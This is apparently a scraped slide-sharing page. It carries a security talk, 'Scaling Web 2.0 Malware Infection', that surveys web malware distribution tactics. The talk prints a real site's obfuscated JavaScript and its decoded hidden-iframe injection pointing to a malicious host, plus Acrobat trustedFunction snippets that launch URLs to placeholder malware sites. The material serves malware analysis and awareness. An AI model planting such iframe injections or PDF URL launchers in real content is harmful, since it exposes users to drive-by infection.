Human Factors of XR: Using Human Factors to Design XR SystemsHuman Factors of XR: Using Human Factors to Design XR Systems
Human Factors of XR: Using Human Factors to Design XR SystemsMark Billinghurst
 
Scanning the Internet for External Cloud Exposures via SSL Certs
Scanning the Internet for External Cloud Exposures via SSL CertsScanning the Internet for External Cloud Exposures via SSL Certs
Scanning the Internet for External Cloud Exposures via SSL CertsRizwan Syed
 
SAP Build Work Zone - Overview L2-L3.pptx
SAP Build Work Zone - Overview L2-L3.pptxSAP Build Work Zone - Overview L2-L3.pptx
SAP Build Work Zone - Overview L2-L3.pptxNavinnSomaal
 
Designing IA for AI - Information Architecture Conference 2024
Designing IA for AI - Information Architecture Conference 2024Designing IA for AI - Information Architecture Conference 2024
Designing IA for AI - Information Architecture Conference 2024Enterprise Knowledge
 
Developer Data Modeling Mistakes: From Postgres to NoSQL
Developer Data Modeling Mistakes: From Postgres to NoSQLDeveloper Data Modeling Mistakes: From Postgres to NoSQL
Developer Data Modeling Mistakes: From Postgres to NoSQLScyllaDB
 
Merck Moving Beyond Passwords: FIDO Paris Seminar.pptx
Merck Moving Beyond Passwords: FIDO Paris Seminar.pptxMerck Moving Beyond Passwords: FIDO Paris Seminar.pptx
Merck Moving Beyond Passwords: FIDO Paris Seminar.pptxLoriGlavin3
 
Are Multi-Cloud and Serverless Good or Bad?
Are Multi-Cloud and Serverless Good or Bad?Are Multi-Cloud and Serverless Good or Bad?
Are Multi-Cloud and Serverless Good or Bad?Mattias Andersson
 
CloudStudio User manual (basic edition):
CloudStudio User manual (basic edition):CloudStudio User manual (basic edition):
CloudStudio User manual (basic edition):comworks
 
Unraveling Multimodality with Large Language Models.pdf
Unraveling Multimodality with Large Language Models.pdfUnraveling Multimodality with Large Language Models.pdf
Unraveling Multimodality with Large Language Models.pdfAlex Barbosa Coqueiro
 
Artificial intelligence in cctv survelliance.pptx
Artificial intelligence in cctv survelliance.pptxArtificial intelligence in cctv survelliance.pptx
Artificial intelligence in cctv survelliance.pptxhariprasad279825
 
Take control of your SAP testing with UiPath Test Suite
Take control of your SAP testing with UiPath Test SuiteTake control of your SAP testing with UiPath Test Suite
Take control of your SAP testing with UiPath Test SuiteDianaGray10
 

Kürzlich hochgeladen (20)

Nell’iperspazio con Rocket: il Framework Web di Rust!
Nell’iperspazio con Rocket: il Framework Web di Rust!Nell’iperspazio con Rocket: il Framework Web di Rust!
Nell’iperspazio con Rocket: il Framework Web di Rust!
 
Connect Wave/ connectwave Pitch Deck Presentation
Connect Wave/ connectwave Pitch Deck PresentationConnect Wave/ connectwave Pitch Deck Presentation
Connect Wave/ connectwave Pitch Deck Presentation
 
Hyperautomation and AI/ML: A Strategy for Digital Transformation Success.pdf
Hyperautomation and AI/ML: A Strategy for Digital Transformation Success.pdfHyperautomation and AI/ML: A Strategy for Digital Transformation Success.pdf
Hyperautomation and AI/ML: A Strategy for Digital Transformation Success.pdf
 
New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024
New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024
New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024
 
Dev Dives: Streamline document processing with UiPath Studio Web
Dev Dives: Streamline document processing with UiPath Studio WebDev Dives: Streamline document processing with UiPath Studio Web
Dev Dives: Streamline document processing with UiPath Studio Web
 
"LLMs for Python Engineers: Advanced Data Analysis and Semantic Kernel",Oleks...
"LLMs for Python Engineers: Advanced Data Analysis and Semantic Kernel",Oleks..."LLMs for Python Engineers: Advanced Data Analysis and Semantic Kernel",Oleks...
"LLMs for Python Engineers: Advanced Data Analysis and Semantic Kernel",Oleks...
 
What's New in Teams Calling, Meetings and Devices March 2024
What's New in Teams Calling, Meetings and Devices March 2024What's New in Teams Calling, Meetings and Devices March 2024
What's New in Teams Calling, Meetings and Devices March 2024
 
DevEX - reference for building teams, processes, and platforms
DevEX - reference for building teams, processes, and platformsDevEX - reference for building teams, processes, and platforms
DevEX - reference for building teams, processes, and platforms
 
Human Factors of XR: Using Human Factors to Design XR Systems
Human Factors of XR: Using Human Factors to Design XR SystemsHuman Factors of XR: Using Human Factors to Design XR Systems
Human Factors of XR: Using Human Factors to Design XR Systems
 
DMCC Future of Trade Web3 - Special Edition
DMCC Future of Trade Web3 - Special EditionDMCC Future of Trade Web3 - Special Edition
DMCC Future of Trade Web3 - Special Edition
 
Scanning the Internet for External Cloud Exposures via SSL Certs
Scanning the Internet for External Cloud Exposures via SSL CertsScanning the Internet for External Cloud Exposures via SSL Certs
Scanning the Internet for External Cloud Exposures via SSL Certs
 
SAP Build Work Zone - Overview L2-L3.pptx
SAP Build Work Zone - Overview L2-L3.pptxSAP Build Work Zone - Overview L2-L3.pptx
SAP Build Work Zone - Overview L2-L3.pptx
 
Designing IA for AI - Information Architecture Conference 2024
Designing IA for AI - Information Architecture Conference 2024Designing IA for AI - Information Architecture Conference 2024
Designing IA for AI - Information Architecture Conference 2024
 
Developer Data Modeling Mistakes: From Postgres to NoSQL
Developer Data Modeling Mistakes: From Postgres to NoSQLDeveloper Data Modeling Mistakes: From Postgres to NoSQL
Developer Data Modeling Mistakes: From Postgres to NoSQL
 
Merck Moving Beyond Passwords: FIDO Paris Seminar.pptx
Merck Moving Beyond Passwords: FIDO Paris Seminar.pptxMerck Moving Beyond Passwords: FIDO Paris Seminar.pptx
Merck Moving Beyond Passwords: FIDO Paris Seminar.pptx
 
Are Multi-Cloud and Serverless Good or Bad?
Are Multi-Cloud and Serverless Good or Bad?Are Multi-Cloud and Serverless Good or Bad?
Are Multi-Cloud and Serverless Good or Bad?
 
CloudStudio User manual (basic edition):
CloudStudio User manual (basic edition):CloudStudio User manual (basic edition):
CloudStudio User manual (basic edition):
 
Unraveling Multimodality with Large Language Models.pdf
Unraveling Multimodality with Large Language Models.pdfUnraveling Multimodality with Large Language Models.pdf
Unraveling Multimodality with Large Language Models.pdf
 
Artificial intelligence in cctv survelliance.pptx
Artificial intelligence in cctv survelliance.pptxArtificial intelligence in cctv survelliance.pptx
Artificial intelligence in cctv survelliance.pptx
 
Take control of your SAP testing with UiPath Test Suite
Take control of your SAP testing with UiPath Test SuiteTake control of your SAP testing with UiPath Test Suite
Take control of your SAP testing with UiPath Test Suite
 

Scaling Web 2.0 Malware Infection

  • 1. Scaling Web 2.0 Malware Infection ______________________________________ Aditya K Sood, Sr. Security Practitioner Armorize , Santa Clara US
  • 2. Disclaimer All contents of this presentation represent my own beliefs and views and do not, unless explicitly stated otherwise, represent the beliefs of my current, or any of my previous in that effect, employers.
  • 3. About Me - $whoami • Senior Security Practitioner , Armorize http://www.armorize.com • Founder , SECNICHE Security. http://www.secniche.org • Worked previously for COSEINC as Senior Security Researcher and Security Consultant for KPMG • Written content Author for HITB E-Zine, Hakin9 ,ELSEVIER, USENIX Journals. • Like to do Bug Hunting and Malware dissection. • Released Advisories to Forefront Companies. • Active Speaker at Security Conferences including RSA etc.
  • 4.  Agenda  Understanding The Malware Anatomy  The Vertical Risk – Malware Impact on Business  Top 10+ Web Malware Infection Strategies  2X Generation - Century Malware Trickeries  Case Study – Infection through PDF Trusted Functions  Demonstration
  • 5.  Pattern Understanding The Malware Anatomy The Dependent Peripherals
  • 6.  Malware Mess – Global Trifecta
  • 8.  Malware Retrospective and Classification Top 5 Malware Categories Top 5 Virus Families Trojan (31.2 %) Stuh (4.4 %) Downloader (25.6 %) Fraudload (3.9 %) Backdoor (13.8 %) Monder (3.6 %) Spyware (13.2 %) Autorun (2.7 %) Adware (4.9%) Buzus (2.7 %) Interdependency
  • 9.  Malware - The Impact on Real World
  • 10.  Malware Trends – The Attack Base  Financial abuse and mass identity theft  The mass destructor – Botnet infection and zombie hosts  Exploiting the link dependency – Pay Per click hijacking  Traffic manipulation – Open redirect vulnerabilities at large scale  Spywares , crypto virology , ransom ware etc  Distributed Denial of Service – The service death game , extortion  Industry change semantics – Malware activation change line  Infection through browsers and portable gadgets – the biggest step  Exploiting anti virus loopholes
  • 11.  Malware Contributing Issues – Rising Steps  Publicly available malware source code  Malware distribution framework such MPACK , NeoSploit etc.  Unpatched vulnerabilities and loosely coupled patches  Demand of underground services and self exposure  Global surveillance mode and information stealing in the wild  Software discrepancies and inherited design flaws such as Browsers.  Exploitation at web level is easy. It opens a door to System Level Fallacies.  Inappropriate security solutions deployed and irrelevant security paradigm  Botnet Infection – The easy way to launch diversified attack  Web sharing and centralized work functionality.
  • 12.  Pattern Understanding The Vertical Risk Web Delivered Malware Impact on Business Underground Market and Malware Flow Model
  • 13.  Underground Malware Market Business - Statistics © GDATA
  • 14.  Practical Malware Flow Model Malware Writers Role Flow of Malware Websites © Reihe Informatik. TR-2007-011
  • 15.  Malware - The Impact on Real World
  • 16.  Pattern Malware – Sources of Infection Web 2.0 Top 10 + Strategies of Distributing Malware through Web
  • 17. Long Live Drive By Download – Base Web Malware Tactic
  • 18. (SEO) Poisoning – Driven with Malware
  • 19. Messengers – Infection at Instant State
  • 20.  Networking Websites – TWITTER Malware Infection  Exploiting the trust relationship on Social Networking Websites  Spreading malware content through Tweets , Scrapping etc  Chain Reaction – Dwells very fast in Website Networks (URL Shortening Trick)
  • 21.  Social Networking – FACEBOOK Malware Applications  Manipulating the Open API Calls  User centric control  Exploiting the design fallacies
  • 22.  Social Networking – FACEBOOK MAIL Infection Step 1 Step 2 Step 3
  • 23.  Online Media Content – You Tube, Google Videos etc !!
  • 24.  Exploiting the Web of Trust – Human Touch
  • 25.  Spywares , Ransom Wares and other Variants etc.
  • 26.  Insidious Spamming – Email , Blogs , Redirectors etc
  • 27. Botnets – Malware Infection at Large Scale
  • 28.  Direct Malware Hosting – Infected Web Domains
  • 29.  System Stringency – Exploiting the Exceptions
  • 30. Malware Kits – Automated Infection
  • 31.  Case Study – Safety Labs Malware Infection Malware Infecting the Security Service Provider Websites. ____________________________________________________________ It is unfortunate that even the Security Solution Provider is also touched by the latest Internet IFRAME threats or rather say infections Thousands of websites on internet have been compromised with malicious Iframes which load exploit code designed to silently install trojans onto susceptible victim computers.
  • 32.  Case Study – Safety Labs Malware Infection
  • 33.  Case Study – Safety Labs Malware Infection Script Source is OBFUSCATED JAVASCRIPT http://www.safety- lab.com/audits/categorylist.pl?lang=en <SCRIPT LANGUAGE=JAVASCRIPT> FUNCTION MDBAN(X){VAR L=X.LENGTH,B=1024,I,J,R,P=0,S=0,W=0,T=ARRAY(63,9,52,47,48,11,7,35, 59,56,0,0,0,0,0,0,43,14,20,5,61,19,54,36,15,30,32,38,22,44,29,28,12,2,55,45,51,62,25,13,27,3,17,0,0,0,0,16,0,34, 0,58,40,31,60 ,49,8,50,4,21,53,1,10,33,41,23,24,37,18,26,57,6,39,46,42);FOR(J=MATH.CEIL(L/B);J>0;J-- ){R='';FOR(I=MATH.MIN(L,B);I>0;I--,L--){{W |=(T[X.CHARCODEAT(P++)-48])<<S;IF(S){R+=STRING.FROMCHARCODE(221^W&255);W>>=8;S- =2}ELSE{S=6}}}EVAL(R);}}MDBAN('ZT8M VN@ZT8UZFKNZYQYUVN8M9Z3VVN@3DQ5YTKCFZUNSPAXDC6AS8UN34AX0TI5M9 QAC0LUYD8C@UQU0LKUZSIYFI8I@2Z@@TE8M8N@FPN39CXHGFKUST0ZMDAXYLY13PL8F3I8MVN5ML E0DMXICGRAD F@HC0LUYCX3U0R3Z2KXZLQY830I0LA5SCLXZJXACD8UZGW5YJ0EY2CU@GI5PXH@MTA8076YF2Y8@FQ5 Y7@HD')</SCRIPT><!-- 213.219.250.100 -->
  • 34.  Case Study – Safety Labs Malware Infection Complexity factor is always high in decoding DEOBFUSCATED JAVASCRIPT the malicious JavaScript. (1) DECODED JAVASCRIPT EVALS() WINDOW.STATUS = 'DONE'; DOCUMENT.WRITE('<IFRAME NAME=5B8F SRC="HTTP://3PIGS.INFO/T/?' + MATH.ROUND(MATH.RANDOM() * 14490) + '5B8F' + '" WIDTH=322 HEIGHT=45 STYLE="DISPLAY:NONE"></IFRAME>') (2) DECODED JAVASCRIPT WRITES RESULT <IFRAME NAME=5B8F SRC="HTTP://3PIGS.INFO/T/?58965B8F" WIDTH=322 HEIGHT=45 STYLE="DISPLAY:NONE"> </IFRAME> HTTP://3PIGS.INFO/T/?58965B8F “ was injected as source for malicious file .
  • 35.  2X Generation Malware Trickeries  System File Patching and Code Injection  Code Interdependency – Malware Adjacency - Code Resuscitation.  Code Randomization, Obfuscation and Morphing  Rootkits and System Cloaking  Exploiting Active X and JavaScript Heaps – Direct Control
  • 36.  Escaping What ! Private & Confidential Property of Armorize
  • 37.  Malware Analysis Methodology (MAM) - Overview End Point Communication  Connection state check  Server identity checks through communication medium.  Error generation like Checksum Integrity.  Encrypted data in packets.  Protocol Switching. Session Stream Analysis – Deep Inspection Analyzing TCP stream session  Extracting an executable from the raw data Behavioral Analysis – Scrutinizing system fallacies  Active debugging  Black Box Testing approach Static Analysis – Reversing the facets of malware Its all about analyzing the code of Malware
  • 38.  Case Study – Malware Infection PDF Trusted Functions (Understanding the Facets of Malware)
  • 39.  Some PDF Truths  Hyperlink execution notification as alerts  Data is not allowed to be stored in the forms http://secniche.org/papers/SNS_09_03_PDF_Silent_Form_Re_Purp_Attack.pdf  Number of vulnerable functions have been removed i.e. from registered state  Support for Adobe reader 7.xx has been removed http://blogs.adobe.com/adobereader/2009/12/adobe_reader_and_acrobat_versi.html  Other alerts have been structured as security checks in standalone PDF’s  ACRO JS does not support DOM as normal JavaScript does. Adobe has inbuilt functionality to provide a code wrappers which calls restricted functions in specific environments. For example:- In general, it is not possible to generate another PDF from the standalone PDF when it is opened
  • 40.  Understanding Malware Infection - PDF  Exploiting the browser – Downloading files through Windows Media Player  Exploiting the Global Access of JavaScript folder in PDF Hidden gift.js file containing malicious code is placed here
  • 41.  Understanding Malware Infection - PDF  Calling Codes through Trusted Functions  Trusted function body calls the app.beginPriv (begin privileges) and app.endPriv(end privileges) to enclose any type of function and code to be trusted.  The trusted functions method can be called successfully on the initialization of the application and it is possible to call certain number of restricted functions through it. myTrustedFunction = app.trustedFunction( function() { <function body> } ); New Scareware Message – Opening a new PDF trustedDoc = app.trustedFunction( function (width,height) { app.beginPriv(); var trustDoc = app.newDoc(width,height); trustDoc.addWatermarkFromText("X JERKED X"); app.endPriv(); return trustDoc; }) trustedDoc(300,300);
  • 42.  Understanding Malware Infection - PDF  Calling Codes through Trusted Propagator Functions myPropagatorFunction = app.trustPropagatorFunction( function() { <function body> } URL Opening - Drive by Download Infections trustedDoc = app.trustedFunction ( function (cURL, bNewFrame) { app.beginPriv(); var trustedDoc = app.launchURL(cURL, bNewFrame); app.endPriv(); return trustedDoc; } ) trustedDoc("http://www.malware1.com",true); trustedDoc("http://www.malware2.com",true); trustedDoc("http://www.malware3.com",true); trustedDoc("http://www.malware4.com",true); trustedDoc("http://www.malware5.com",true);
  • 43.  Understanding Malware Infection - PDF
  • 45.  Questions and Queries
  • 46.  Thanks and Regards Special thanks to Armorize for pushing me to do more research. http://www.armorize.com __________________________________________________________________________________ Portal and Blog SecNiche Security – http://www.secniche.org | http://zeroknock.blogspot.com (Screenshots shared from various resources)